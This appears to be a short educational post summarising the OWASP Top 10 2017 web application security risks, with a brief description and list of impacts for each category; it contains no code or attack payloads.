OWASP stands for Open Web Application Security Project and it’s an open-source application security community with goal of improving security of the software. It’s an industry standard guideline that lists the most critical application security risks which enables developers to secure the application they develop & deploy.

OWASP Top 10 2017 Standards:

1. Injection

This happens when untrusted source inject code into the user input which tricks the query interpreter to run malicious command

Impact:

  • Compromise of the application or underlying host
  • Exposure of sensitive data

2. Broken Authentication

This happens when authentication & session mgmt. are not implemented correctly (unexpired session tokens), which allows attackers to compromise passwords, keys

Impact:

  • User Identify theft
  • Compromise of sensitive data

3. Sensitive Data Exposure

This happens when attackers steal or modify weakly protected data without extra protection, such as encryption at rest or in transit

Impact:

  • Compromise of regulated data (e.g., HIPAA or GDPR)
  • Non-complaint status for privacy laws and regulation

4. XML External Entities

This happens when XML input containing a reference to an external entity is processed by an older or poorly configured parser. That can result in processers exploit to extracting data, execute code remotely

Impact:

  • Theft of sensitive data
  • Denial of Service Attacks (DoS)

5. Broken Access Control

This happens when restrictions on what each authenticated users are allowed to do is not properly enforced resulting in attackers get access to the application & get access to sensitive files

Impact:

  • Compromise of sensitive data
  • Modification or Deletion of data

6. Security Misconfiguration

This happens when there are misconfiguration flaws during configuration of application (unnecessarily enabled default ports, unchanged passwords, unpatched framework or services, revealing stack trace in case of errors) will enable attackers to gain information about deployment and access the server to disrupt operations

Impact:

  • Compromise of System
  • Information Disclosure

7. Cross-site scripting

This happens when untrusted user input is executed as part of the HTML or when users are influenced to interact with malicious links through which attackers execute scripts in the victim’s browser which can hijack user sessions or redirect the user to malicious sites

Impact:

  • Takeover victim’s account in the application
  • Compromise of data

8. Insecure Deserialization

This happens when languages/frameworks allow untrusted serialized data to be expanded into an object (e.g., When developers place no restriction on method that can self-execute during deserialization process which doesn’t verify source or contents before deserialization) which allows users to do remote code execution and gain unauthorized access.

Impact:

  • Remote Code Execution

9. Using components with known vulnerabilities

This happens when open source or third-party frameworks & libraries used in application run with same privileges which enables attackers to leverage vulnerable components for malicious attack

Impact:

  • Remote Code Execution
  • Compromise of application

10. Insufficient Logging and Monitoring

This happens when there is insufficient logging (which doesn’t provide sufficient detail for understanding what attackers did) and monitoring process (alert threshold & response processes are insufficient)

Impact:

  • Gain unauthorized access
  • Compromise of Data